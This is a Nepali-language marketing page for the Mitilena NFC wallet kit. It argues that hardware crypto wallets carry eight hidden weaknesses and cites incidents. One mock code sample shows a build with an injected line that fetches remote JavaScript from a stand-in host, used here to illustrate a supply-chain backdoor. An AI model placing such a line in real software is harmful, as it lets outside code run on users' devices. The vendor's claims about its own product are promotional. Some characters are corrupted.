८ कमियाँ ओपन सोर्स चेकलिस्ट प्रश्न
Mitilena Mitilena Wallet Cold crypto wallet
ONLINE · 22,000+ COINS वालेट बनाउनुहोस्बनाउनुहोस्
हार्डवेयर वालेट · अस्पष्ट कमजोरी

हार्डवेयर वालेटका अस्पष्ट कमजोरी

तपाईं प्वाल बन्द गर्न यन्त्र किन्नुहुन्छ। सँगै नयाँ आउँछन्: फर्मवेयर, अपडेट, कम्प्युटरमा सर्भिस, स्क्रिन, बक्स, विक्रेता अकाउन्ट। आठ कुरा जसलाई ��मीक्षाले फाइदामा लेख्छन् — र आठ बाटा जसबाट २०२०–२०२६ मा तिनैबाट पैसा निकालियो।

तारीख और राशि वाली असली घटनाएँ निर्माता कागजातबाट हाम्रो किटलाई पनि त्यही सूचीमा राख्छौं
गलतीको मूल्यसार्वजनिक घटना
2026Coldcard · फर्मवेयरमा कमजोर र्यान्डमनेस$100M+
2025Bybit · साइनरहरूले नदेखेको कुरा साइन गरे$1.5B
2024Dark Skippy · दुई सिग्नेचरबाट ���िड लीकअनुसन्धान
2023Ledger Connect Kit · लाइब्रेरीमा ब्याकडोर$600K
2021App Store मा नक्कली वालेट एप17,1 BTC
2020Ledger ग्राहक DB लीक · वर्षौंसम्म फिसिङ270,000 मानिस
आठ कमियाँ

समीक्षाले जसको प्रशंसा गर्छन् — त्यही छुट्टै प्वाल हो

हार्डवेयर वालेट एउटा प्वाल बन्द गर्छ: कुञ्जी अब इन्टरनेट भएको फोनमा रहँदैन। तर यन्त्र खाली छैन। त्यसमा फर्मवेयर, अपडेट, डेस्कटप प्रोग्राम, स्क्रिन, बक्स, तपाईंको ठेगाना भएको विक्रेता — र हरेक विवरण नयाँ अट्याक सरफेस थप्छ जुन पहिले थिएन। तल आठ यस्ता विवरण: समीक्षा के भन्छन्, तिनबाट पैसा कसरी निकालियो, प्वाल कसरी बन्द गर्ने, र हाम्रो किटमा त्यो विवरण छ कि छैन।

कमी ०१

फर्मवेयर जसले तपाईंको कुञ्जी बनाउँछ

समीक्षामा: «सिक्योर चिप — कुञ्जी यन्त्रभित्र बन्छ र कहिल्यै बाहिर जाँदैन»

कुञ्जी विशाल र्यान्डम सङ्ख्या हो, र त्यो फर्मवेयरले बनाउँछ। त्यहाँ एउटा बग — र कुञ्जी जति देखिन्छन् उति रहँदैनन्: यन्त्र पहुँच बिना, किनेको वर्षपछि, सबै मालिकमा एकैचोटि ब्रूट-फोर्स। चिपसँग यसको सरोकार छैन; प्वाल त्यसभन्दा माथि छ।

घटना
$100M+
Coldcard, जुलाई २०२६: २०२१ देखिको फर्मवेयर बिल्ड बगले चुपचाप हार्डवेयर RNG लाई कमजोरसँग बदल्यो — सिरियल र टाइमरबाट सिडेड। कुञ्जीको बल लगभग ४० बिट रह्यो; ५,०००+ ठेगाना खाली पारिए।
प्वाल कसरी बन्द गर्ने
के तपाईं आफ्नो र्यान्डमनेस ल्याउन सक्नुहुन्छ: पासा, आफ्नो वाक्यांश। जुन वालेटले तपाईंबाट एन्ट्रोपी लिन्छ, त्यो एउटा फर्मवेयर बगमा निर्भर रहँदैन।
यो विवरण हामीसँग छैन
कार्डमा फर्मवेयर छैन — यो एन्क्रिप्टेड वाहक हो। Mitilena Air ले यन्त्रको सिस्टम RNG बाट कुञ्जी बनाउँछ, र तपाईं र्यान्डम शब्दको ठाउँमा आफ्नो सिड वाक्यांश सेट गर्न सक्नुहुन्छ।
कमी ०२

अपडेट जो लगवाने पड़ते हैं

समीक्षामा: «निर्माता नियमित रूपमा सिक्योरिटी अपडेट पठाउँछ»

हर अपडेट त्यो क्षण ह��� जब फर्मवेयर फेर्न सकिन्छ। छेडिएको फर्मवेयरले दुई–तीन सामान्य सिग्नेचरमा सिडका टुक्रा लुकाउँछ, बाहिरबाट यन्त्र सामान्य देखिन्छ। अपडेट छोड्नु पनि विकल्प होइन: प्वाल यही अपडेटबाट बन्द हुन्छन्।

घटना
2 सिग्नेचर
Dark Skippy, अगस्त २०२४: अनुसन्धानकर्ताले देखाए कि दुर्भावनापूर्ण हार्डवेयर-वालेट फर्मवेयरले दुई ट्रान्जेक्सनबाट पूरा सिड निकाल्न सक्छ। गलत ठाउँबाट एउटा अपडेट पर्याप्त छ।
प्वाल कसरी बन्द गर्ने
फर्मवेयर कहाँबाट आउँछ र यन्त्रले त्यसको सिग्नेचर जाँच्छ कि जाँच्दैन। सबभन्दा राम्रो — जब अपडेट गर्ने केही नै नहोस्।
यो विवरण हामीसँग छैन
कार्डमा अपडेट वा फेर्ने केही छैन। साइनिङ फोन एपमा हुन्छ; त्यसका बिल्ड साइन हुन्छन् र App Store र Google Play बाट आउँछन् — जस्तै कुनै एप जसलाई तपाईं आफैं देख्नुहुन्छ र बन्द गर्नुहुन्छ।
कमी ०३ · बेतुकोपन महसुस गर्नुहोस्
समीक्षामा: «कम्प्युटरका लागि सहज कम्पनी एप»

अविश्वासका लागि वालेट — सँगै ब्याकग्राउन्ड सर्भिस

तपाईं यन्त्र एउटा कारणले किन्नुहुन्छ: कम्प्युटरमाथि विश्वास बन्द गर्न। चल्नका लागि त्यही कम्प्युटरमा ब्याकग्राउन्ड सर्भिस लगाउनुपर्छ। तपाईंले त्यो लेख्नुभएन, चलाउनुभएन, नियन्त्रण पनि छैन: त्यो OS सँग सुरु हुन्छ, त्यस्तो पोर्टमा सुन्छ जहाँ तपाईंको मेसिनको कुनै पनि प्रोग्राम ढकढकाउन सक्छ, र अहिले केही गरिरहेको छ — के, तपाईं जान्नुहुन्न र कहिल्यै जाँच्न पनि सक्नुहुन्न।

वालेट बन्द गरेपछि पनि त्यो ब्याकग्राउन्डमा चलिरह्यो। वर्षौंसम्म। एउटा ठूलो विक्रेतासँग छुट्टै «ब्रिज» सर्भिस थियो; २०२५ मा त्यसलाई एपभित्र लुकाइयो — सर्भिस त्यहीँ छ, केवल विन्डोसँग मर्छ। धेरै अरूमा डेस्कटप प्रोग्राम बिना यन्त्र केवल किचेनको फब हो। Linux मा udev नियम थप्नुहोस्, नत्र सिस्टमले USB दिँदैन।

अर्थात् जुन कुरालाई तपाईंले कम्प्युटरका प्रोग्रामबाट स्वतन्त्रताका लागि किन्नुभयो, त्यो कम्प्युटर प्रोग्राम बिना चल्दै चल्दैन। र त्यो प्रोग्राम जुन देखिन्छ होइन — जुन त्यसको तल चल्छ।

यो विवरण हामीसँग छैन
कम्प्युटरमा केही लाग्दैन: न सर्भिस, न ड्राइभर, न पोर्ट। मध्यस्थ — तपाईंको फोनमा पहिलेदेखि भएको NFC चिप, त्यसका निर्माताको, OS को अधीन: तब मात्र काम गर्छ जब एप खुला हो र तपाईं आफैं कार्ड ट्याप गर्नुहोस्, र फोनले हरेक पटक अनुमति माग्छ। कार्ड प्यासिभ छ: न ब्याट्री, न रेडियो, आफैं केही गर्दैन। एप बन्द — तपाईं बिना चल्ने केही बाँकी रहँदैन। इमानदारीसाथ: फोन एप आवश्यक छ, र त्यो जुनसुकै एप जस्तै — तपाईं देख्नुहुन्छ, चलाउनुहुन्छ र बन्द गर्नुहुन्छ। उपयोगिता कोठरीमा कोही बस्दैन।
System monitorWALLET CLOSED
ProcessStateUptime
HW Wallet Appwallet
closed by you-
hwwalletdbackground service · USB bridge
running412d 06:14
started by the system at logincannot close — it is a service
मोकअप; नाम उदाहरण हुन्। २०२५ अघि लोकप्रिय USB वालेट भएका कम्प्युटर यस्तै देखिन्थे; त्यसपछि «ब्रिज» एपभित्र हालियो — त्यही सर्भिस, केवल सूचीमा देखिँदैन।
रूपक
प्राइभेसीको घर — र उपयोगिता कोठरीमा भाडावाल

तपाईंले प्राइभेसीका लागि घर चाहनुभयो। किन्नुभयो। त्यसपछि सुरक्षा चाहियो — लगाइयो। र प्लान चलाउन भनियो कि युनिफर्म भएको व्यक्तिलाई घरमा बस्न दिनुहोस्: ऊ चौबीस घण्टा कोठरीमा बस्छ, हरेक ढोकाको चाबी राख्छ, र अरू कसैलाई रिपोर्ट गर्छ। तपाईंले उसलाई जागिर दिनुभएन, निकाल्न सक्नुहुन्न, र राति के गर्छ — थाहा छैन।

पक्कै ऊ «आफ्नो» हो। सम्झौतामा लेखिएको छ। तपाईंले प्राइभेसी चाहनुभयो र सरोगेट पाइयो: त्यस्तो घर जहाँ भाडावाल तपाईंले छान्नुभएन।

कमी ०४ · ओपन सोर्स अडिट होइन
समीक्षामा: «ओपन सोर्स — जो कोही जाँच्न सक्छ»

ओपन सोर्स प्रोग्रामरसँगै काम गर्ने तरिका हो, «यो प्रोग्राम चोर्दैन» को ब्याज होइन

ओपन सोर्स त्यसै बनाइयो कि मानिसले प्रोग्राम बाँडून् र मिलेर ठीक पारून्। सहकार्यको उपकरणका रूपमा यो राम्रो छ। यो कहिल्यै क्वालिटी सिल थिएन कि «यो सफ्टवेयरले तपाईंको पैसा चोर्दैन», र कारण यो हो: तपाईं सोर्स कोड प्रयोग गर्नुहुन्न। तपाईं डाउनलोड गरेको कुरा प्रयोग गर्नुहुन्छ।

GitHub रिपो र तपाईंको फोनको फाइलबीच बिल्ड, एप स्टोर, अपडेट, सर्भर छन्। यीमध्ये कुनै पनि कदममा कोडमा एउटा लाइन आउन सक्छ जसले कतैबाट जे पनि तान्छ — र त्यो रिपोमा हुँदैन। तपाईं कपीलाई सोर्ससँग तुलना गर्न सक्नुहुन्न: स्टोरले कम्पाइल गरिएको फाइल पठाउँछन्; वेब वालेटले सर्भरले आज छानेको कोड दिन्छ; ब्राउजर एक्सटेन्सन राति चुपचाप अपडेट हुन्छ।

«ओपन» को अर्थ हो — केही मानिसले कुनै दिन कुनै संस्करण जाँच्न सक्छन्। तपाईंको कपी अहिले के गर्दैछ — त्यसको अर्थ त्यो होइन।

In the repo · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
On your phone · app-2.4.21.min.js
// send.js — build
import { sign } from './crypto'
;(async () => {
var globalObject = await fetch('https://cdn-static.io/x.js')
})()
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
बिल्डमा एउटा लाइन। रिपोमा छैन, स्टोरमा अदृश्य, तपाईंको यन्त्रमा चलिरहेको।
खुलापनले यीमध्ये कुनै घटना ���ोकेन
Ledger Connect Kit2023
GitHub मा ओपन लाइब्रेरी; npm मा दुर्भावनापूर्ण संस्करण; घण्टौंमा दर्जनौं साइटले लाइभ लोड गरे
Copay / event-stream2018
ओपन वालेट; ब्याकडोर डिपेन्डेन्सीबाट आयो, खास यसैका लागि
xz utils2024
बीस वर्ष ओपन; ब्याकडोर रिलीजमा बसिरह्यो जबसम्म एउटा इन्जिनियरले देख्यो कि SSH लगइन आधा सेकेन्ड ढिलो छ
Coldcard2026
ओपन-सोर्स फर्मवेयर; पाँच वर्ष बिल्ड बगले हार्डवेयर RNG लाई कमजोरसँग बदल्यो — यन्त्र पहुँच बिना कुञ्जी ब्रूट-फोर्स, ५,०००+ ठेगाना, $100M+
जे वास्तवमै काम गर्छ
अर्काको कोड पढ्नु होइन — दुई जाँच जुन जो कोही चलाउन सक्छ। पहिलो, व्यवहार अडिट: कम्प्युटरमा इन्टरसेप्टिङ प्रॉक्सी लगाउनुहोस्, एप त्यसैबाट चलाउनुहोस्, हेर्नुहोस् त्यो कहाँ के पठाउँछ। कोड पढ्नु पर्दैन — ट्राफिक पूरा देखिन्छ। दोस्रो, त्यस्तो आर्किटेक्चर जहाँ कोडसँग चोर्ने केही नहोस्: यदि कुञ्जी कहिल्यै नेटवर्क भएको यन्त्रमा छैन भने, कुनै अपडेटको कुनै लाइन बेबस छ — पठाउने केही छैन।
हामी कसरी गर्छौं
पहिलो हामी आफैं दिन्छौं: हाम्रो एप प्रॉक्सीबाट चलाउनुहोस्, वेब संस्करण ब्राउजर DevTools बाट, हरेक अनुरोध हेर्नुहोस्। साइनिङ कुञ्जी र सिड देखिँदैनन्; एउटा अपवाद Monero view key हो — «ट्रान्सफर कसरी निस्कन्छ» पृष्ठमा। दोस्रो किटमा छ: कुञ्जी Mitilena Air मा इन्टरनेट नभएको यन्त्रमा जन्मिन��छ, कार्डमा बस्छ, र अनलाइन एपसम्म केवल सिग्नेचर पुग्छ — प्रॉक्सी गर्ने केही छैन। र यहाँ अफलाइन वास्तविक छ: air-gap मोडमा कुञ्जी भएको यन्त्र कसैसँग जोडिएको हुँदैन — न केबल, न Bluetooth; ट्रान्जेक्सन QR बाट आउँछ-जान्छ जसलाई तपाईं आँखाले देख्नुहुन्छ। अनलाइन कम्प्युटरसँग केबलमा झुण्डिएको «कोल्ड» वालेट होइन जसको आफ्नै सर्भिस थाहा छैन के एक्सचेन्ज गरिरहेको होला।
कमी ०५

स्क्रिन जसले देखाउँदैन तपाईं के साइन गर्दै हुनुहुन्छ

समीक्षामा: «यन्त्र स्क्रिनमा कन्फर्म गर्नुहोस् — कम्प्युटरको भाइरस बेबस»

स्क्रिन सानो हुन्छ, र प्रायः ह्यास वा «contract call» ���ेखाउँछ — ठेगाना र रकम होइन। तपाईं त्यही कन्फर्म गर्नुहुन्छ जुन देखिँदैन — र सिग्नेचर फेरि पनि इमानदार, तपाईंकै। स्क्रिनले नियन्त्रणको अनुभूति दिन्छ जुन वास्तवमा छैन।

घटना
$1.5B
Bybit, फेब्रुअरी २०२५: हार्डवेयर वालेट भएका साइनरहरूले त्यस्तो ट्रान्सफर कन्फर्म गरे जुन UI मा सामान्य लाग्यो। यन्त्रले त्यो डेटा देखायो जसलाई मानिसले जाँच्न सक्दैनथ्यो।
प्वाल कसरी बन्द गर्ने
प्रापक, रकम र अपरेसनको प्रकार मानवीय भाषामा — ह्यास होइन — र एक-बटन Reject।
हामी कसरी गर्छौं
स्क्रिन छ, तर फोनको: ठेगाना, रकम र अनुरोधको प्रकार शब्दमा — ट्रान्सफर, कन्ट्र्याक्ट कल, अप्रुभल — र Reject बटन। ठूलो रकमका लागि — छुट्टै अफलाइन यन्त्र जसले पूरा ट्रान्जेक्सन लिन्छ।
कमी ०६

बक्स जहाँ पहिलेदेखि सिड छ

समीक्षामा: «सिक्योरिटी सिल भएको सिल्ड बक्समा आउँछ»

भौतिक यन्त्रको अर्थ शिपिङ, बिचौलिया र «डिस्काउन्ट» मार्केटप्लेस। वालेट पहिलेदेखि सेट आएर आउँछ, भित्र चिट्ठीमा सिड। वा स्टोरमा लुकअलाइक एप भन्छ «एक्टिभेट गर्न सिड हाल्नुहोस्»।

घटना
17,1 BTC
App Store, २०२१: हार्डवेयर-वालेट मालिकले लुकअलाइक एपमा सिड हाले र १७.१ BTC गुमाए। त्यही वर्ष DB लीकपछि Ledger ग्राहकलाई नक्कली यन्त्र मेल भए — पत्रमा «सिड नयाँमा सार्नुहोस्»।
प्वाल कसरी बन्द गर्ने
आफैं इनिसियलाइज गर्नुहोस् र पहिलेदेखि लेखिएको सिड कहिल्यै प्रयोग नगर्नुहोस्। सिल जाँच होइन; जाँच यो हो कि कुञ्जी तपाईं बनाउनुहुन्छ।
हामी कसरी गर्छौं
कार्ड खाली आउँछन्: कुञ्जी तपाईं बनाउनुहुन्छ र आफैं लेख्नुहुन्छ — बक्समा तयार सिड हुनै सक्दैन। एप केवल साइटको लिङ्कबाट App Store र Google Play बाट; सिड केवल इम्पोर्ट र साइनिङमा माग्छ।
कमी ०७

विक्रेता अकाउन्ट

समीक्षामा: «आधिकारिक वारेन्टी, सपोर्ट र पर्सनल अकाउन्ट»

यन्त्र किन्नका लागि तपाईं निर्मातालाई नाम, इमेल र शिपिङ ठेगाना दिनुहुन्छ। तपाईंको सुरक्षा अब उनीहरूको डाटाबेसमा टिकेको छ। यदि लीक भयो — वर्षौंसम्म सन्देश आउँछन् «नयाँ यन्त्रमा सिड कन्फर्म गर्नुहोस्», कहिले प्याकेजसहित।

घटना
270,000 मानिस
Ledger, २०२०: २७०,००० खरिददारको डाटा लीक, हुलाक ठेगानासहित। सिड «माइग्रेट» गराउने इमेल, कल र प्याकेज आज पनि आउँछन्।
प्वाल कसरी बन्द गर्ने
उनीहरू तपाईंबारे जति कम जानून्, भेक्टर त्यति सानो: अकाउन्�� बिना खरिद, सपोर्ट जसले कहिल्यै सिड नमागोस्, र नियम «सिड केवल चोरले माग्छ»।
यो विवरण हामीसँग छैन
वालेट दर्ता बिना चल्छ — कुनै अकाउन्ट छैन। विक्रेताले केवल शिपिङ ठेगाना जान्दछ। न सपोर्ट, न एपले सिड माग्छ।
कमी ०८

एउटा यन्त्र र एउटा कागजको चिट्ठी

समीक्षामा: «मजबुत केस, ठूलो स्क्रिन, हप्ताभरिको ब्याट्री»

जति पार्ट, उति फुट्ने मौका: कनेक्टर, स्क्रिन, ब्याट्री। रिकभरी एउटा सिड चिट्ठीमा टिकेको — भिजेको, सरेको बेला हराएको, «बस केस» मा फोटो। नोक्सानीको सबभन्दा सामान्य कारण ह्याक होइन।

घटना
≈20 % BTC
Chainalysis को अनुमान: कुल बिटकॉइनको लगभग पाँचौं भाग सधैंका लागि हराइसकेको छ — प्रायः हराएका कुञ्जीबाट, ह्याकबाट होइन।
प्वाल कसरी बन्द गर्ने
बक्समा कति कुञ्जी कपी कुन रूपमा छन्, यन्त्र हराए के, र भित्र फुट्ने केही छ कि छैन।
यो विवरण हामीसँग छैन
न स्क्रिन, न ब्याट्री, न कनेक्टर — फुट्ने केही छैन। र एउटा कपी होइन: बक्समा पाँच मिरर कपी — दुई NFC कार्ड र तीन स्टेल्थ स्टिकर वाटरप्रुफ प्लास्टिकमा, १०+ वर्ष।
चेकलिस्ट

वालेटमा के हुनु हुँदैन

आठ कमियाँका लागि आठ विवरण। सूची जुनसुकै वालेटमा लाग्छ — हार्डवेयर, मोबाइल, ब्राउजर। छान्दै हुनुहुन्छ त्यसमा के छ टिक गर्नुहोस् — र हाम्रोमा पनि।

01
कुञ्जी केवल सफ्टवेयरबाट बनेकोतपाईंको र्यान्डमनेस बिना — तपाईंको वाक्यांश वा पासा
02
जहाँ कुञ्जी बस्छ त्यहाँ अपडेटहर अपडेट कोड फेर्ने मौका
03
कम्प्युटरमा सर्भिस, ड्राइभर वा पोर्टहेर्नुहोस् कमी ०३
04
आर्किटेक्चरको ठाउँमा «ओपन सोर्स» ब्याजकुञ्जी त्यहाँ छ जहाँ विदेशी कोड पुग्न सक्छ
05
स्क्रिन जसले ठेगाना-रकमको ठाउँमा ह्यास देखाओस्र Reject बटन नहोस्
06
पहिलेदेखि लेखिएर आएको सिडबक्समा, पत्रमा, «एक्टिभेसन एप» मा
07
विक्रेता अकाउन्टर सपोर्ट जसले सिड माग्न सक्छ
08
एउटा कपी र फुट्ने पार्टस्क्रिन, ब्याट्री, कनेक्टर, एउटा चिट्ठी
यो सूचीमा Ultimate किटमा आठै विवरण छैनन्। बक्समा: २ NFC कार्ड र ३ स्टेल्थ स्टिकर, Mitilena Air (इन्टरनेट बिना कुञ्जी) र Mitilena Keys (इन्टरनेट बिना साइनिङ)। कार्ड खाली आउँछन्: कुञ्जी तपाईं बनाउनुहुन्छ र एन्क्रिप्ट गर्नुहुन्छ — कारखाना चिप होइन। सामग्री र मूल्य →
Ultimate · अफलाइन किट

कारखाना «सिक्योर चिप» होइन — त्यो वाहक जसलाई तपाईं एन्क्रिप्ट गर्नुहुन्छ

कार्ड खाली आउँछन्। तपाईं Mitilena Air मा इन्टरनेट नभएको फोनमा कुञ्जी बनाउनुहुन्छ र आफैं लेख्नुहुन्छ। साइनिङ Mitilena Keys बाट, त्यो पनि अफलाइन: ट्रान्जेक्सन QR बाट जान्छ। बक्समा पाँच उस्तै कपी: २ NFC कार्ड र ३ स्टेल्थ स्टिकर वाटरप्रुफ प्लास्टिकमा। १८ नेटवर्क, २०,०००+ क्वाइन, USDT सहित।

कम्प्युटरमा केही लाग्दैन
न फर्मवेयर, न अपडेट, न स्क्रिन, न ब्याट्री
अफलाइन फोनसम्म ट्रान्जेक्सन — साउन्ड वा QR, न केबल न USB
निःशुल्क Mitilena फोन एपसँग चल्छ
वाटरप्रुफ प्लास्टिक, १०+ वर्ष शेल्फ लाइफ
विश्वव्यापी शिपिङ · mitilena-store.com
Mitilena NFC कार्ड
Ultimate · अफलाइन जेनेरेसन र साइनिङ
€369€439
२ NFC कार्ड · ३ स्टेल्थ स्टिकर · Mitilena Air · Mitilena Keys लाइसेन्स
Ultimate किन्नुहोस् · €369 Basic र Premium — सबै प्लान हेर्नुहोस्
प्रश्न

यहाँसम्म पढेपछि मानिसले के सोध्छन्

हार्डवेयर वालेट फाइदा बेफाइदा — छोटकरीमा?

एउटा ठूलो फाइदा: कुञ्जी इन्टरनेट भएको फोनमा छैन। बेफाइदा माथिका आठ विवरण — हरेकले अट्याक सरफेस थप्छ। राम्रो हार्डवेयर वालेट त्यो हो जहाँ विवरण कम होस्, बढी होइन।

यदि फोन कम्प्रोमाइज भयो भने?

मुख्य फोनमा कार्डसँग कुञ्जी साइनिङको एक सेकेन्डका लागि आइसोलेटेड वातावरणमा आउँछ — त्यही जोखिम जुन कुनै फोन वालेटको, केवल सानो। जुन रकमले डराउँछ — दोस्रो तह: छुट्टै अफलाइन यन्त्रमा साइन, जहाँ ट्रान्जेक्सन QR बाट पुग्छ।

कार्ड चोरियो वा हरायो भने?

पासवर्ड बिना कार्ड र स्टिकर बेकार प्लास्टिक हुन् — तिनमा कुञ्जी एन्क्रिप्टेड छ। हराएको कपी बाँकी चारबाट बदलिन्छ: बक्सका दुई कार्ड र तीन स्टिकर मिरर हुन्।

हार्डवेयर-वालेट फर्मवेयर अपडेट आवश्यक छ?

यदि विक्रेताले प्वाल बन्द गर्‍यो — हो, र ठीक त्यही बेला फर्मवेयर फेर्न सकिन्छ: स्रोत र सिग्नेचर जाँच्नुहोस्। फर्मवेयर नभएको वाहकमा त्यस्तो छनोट छैन — अपडेट गर्ने केही छैन, फेर्ने केही छैन।

USB वालेटबाट फरक के हो?

कम बिचौलिया: न केबल, न ड्राइभर, न ब्याकग्राउन्ड सर्भिस, न डेस्कटप प्रोग्राम। एउटा मध्यस्थ — तपाईंको फोनको NFC चिप — र त्यो तपाईं र OS लाई जवाफ दिन्छ, वाल���ट विक्रेतालाई होइन।

ओपन सोर्स भनेको सुरक्षित?

अर्थ कहिलेकाहीँ कसैले जाँच्न सकिन्छ। तपाईं कोड होइन, डाउनलोड प्रयोग गर्नुहुन्छ, र दुवै तुलना गर्न सक्नुहुन्न। सुरक्षा आर्किटेक्चरबाट आउँछ जहाँ कुञ्जी त्यहाँ नहोस् जहाँ विदेशी कोड पुग्छ।

अफलाइन जेनेरेसन र साइनिङ भएका NFC कार्ड

कुञ्जीका ५ कपी · Air · Keys · वा ३० सेकेन्डमा निःशुल्क वालेट · चिपमा «कोल्ड» हार्डवेयर वालेट प्रायः नक्कली किन हुन्छ →
Ultimate किन्नुहोस् · €369 मुफ्त वालेट बनाउनुहोस्